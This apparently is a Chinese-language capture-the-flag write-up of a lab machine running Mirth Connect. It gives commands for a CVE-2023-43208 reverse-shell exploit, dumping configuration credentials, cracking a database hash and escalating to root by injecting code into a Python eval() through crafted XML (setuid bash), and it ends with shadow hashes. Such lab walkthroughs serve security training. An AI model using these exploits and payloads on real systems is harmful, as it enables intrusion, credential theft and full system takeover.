基本信息

端口扫描

22,80,443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -sC -sV -Pn 10.129.241.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 20:32 +0900
Nmap scan report for 10.129.241.75
Host is up (0.088s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 07:eb:d1:b1:61:9a:6f:38:08:e0:1e:3e:5b:61:03:b9 (ECDSA)
|_  256 fc:d5:7a:ca:8c:4f:c1:bd:c7:2f:3a:ef:e1:5e:99:0f (ED25519)
80/tcp  open  http     Jetty
|_http-title: Mirth Connect Administrator
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp open  ssl/http Jetty
|_http-title: Mirth Connect Administrator
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mirth-connect
| Not valid before: 2025-09-19T12:50:05
|_Not valid after:  2075-09-19T12:50:05
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.09 seconds

80/443

Mirth Connect:

2021相当老的版本

CVE-2023-43208 to mirth

搜索可以找到相关漏洞:

exp打到mirth用户:

1
2
# 这里需要443,80显示Not Vulnerable
python3 mirthconnect_exploit.py -t 10.129.241.75 -p 443 -lh 10.10.14.54 -lp 4444 --exploit

Mysql

常规翻文件,配置文件中得到数据库密码:

1
2
3
4
5
6
7
8
9
10
11
mirth@interpreter:/usr/local/mirthconnect/conf$ cat mirth.properties

# keystore
keystore.path = ${dir.appdata}/keystore.jks
keystore.storepass = 5GbU5HGTOOgE
keystore.keypass = tAuJfQeXdnPw
keystore.type = JCEKS

# database credentials
database.username = mirthdb
database.password = MirthPass123!

然后查看数据库,得到hash:

1
2
3
4
5
6
7
8
mysql -u mirthdb -p'MirthPass123!'

MariaDB [(none)]> show databases;
MariaDB [(none)]> use mc_bdd_prod;

MariaDB [mc_bdd_prod]> select * from PERSON_PASSWORD;

u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==

hash crack

这部分要处理一下格式:

1
2
3
4
5
6
# hash.txt
sha256:600000:u/+LBBOUnac=:YshQbDDqCAzy21EdK5OfZBJD1Ne4rXa1VgP5CzLd8Ps=

sudo hashcat 10900 hash.txt ~/Tools/dict/rockyou.txt

snowflake1

sedric & user flag

得到的密码登录sedric用户:

notif

查看进程可以看到root运行的一个notif.py:

1
2
sedric@interpreter:~$ ps aux
root        3567  0.0  0.7  39872 31708 ?        Ss   06:27   0:00 /usr/bin/python3 /usr/local/bin/notif.py

查看代码可以知道是一个flask server,处理post的xml:

可以注意到输入数据直接进入到自定义的template函数中处理,然后查看template函数,可以看到有简单的输入校验,之后直接代入到template中,之后进入eval,导致可以代码注入:

1
2
3
4
5
6
7
# From Gemini
1. 核心漏洞:eval() 引发的远程代码执行 (Critical)
在 template 函数中,代码使用了 eval(f"f'''{template}'''")。

问题所在:虽然代码尝试通过正则表达式 pattern 进行过滤,但该正则表达式包含 (), {}, =, +, /, . 等特殊字符。这些字符足以构造出合法的 Python 表达式。

后果:攻击者可以通过精心构造的 first 或 last 等参数注入 Python 代码。例如,利用 __class__, __globals__ 等属性访问 Python 的底层对象,进而执行任意系统命令(如删除文件、反弹 Shell 等)。永远不要在用户可控的输入上使用 eval()。

提权 & root flag

所以就是构造恶意xml,利用代码注入执行命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
echo 'import os;os.system("chmod +s /bin/bash");' | base64

aW1wb3J0IG9zO29zLnN5c3RlbSgiY2htb2QgK3MgL2Jpbi9iYXNoIik7Cg==

python3 - << 'EOF'
import http.client
xml = """<patient>
  <timestamp>20250101120000</timestamp>
  <sender_app>TEST</sender_app>
  <id>12345</id>
  <firstname>{exec(__import__("base64").b64decode("aW1wb3J0IG9zO29zLnN5c3RlbSgiY2htb2QgK3MgL2Jpbi9iYXNoIik7Cg==").decode())}</firstname>
  <lastname>Doe</lastname>
  <birth_date>01/01/1990</birth_date>
  <gender>M</gender>
</patient>"""
conn = http.client.HTTPConnection("127.0.0.1", 54321)
conn.request("POST", "/addPatient", body=xml, headers={"Content-Type":"application/xml"})
resp = conn.getresponse()
print(resp.status, resp.reason)
print(resp.read().decode())
EOF

shadow

1
2
root:$y$j9T$o.VVihLzQteSMxpHLdRkO.$ye7gwugB75H18vxlZ9Yp8uak36M3opreZHoWrWOJto7:20307:0:99999:7:::
sedric:$y$j9T$MMATL11rB9egotaJXLTma0$VZ43M7Rr6.Ls7g8gZwoPCRWIXi6Wjv8j/d8iublq1nB:20495:0:99999:7:::

参考资料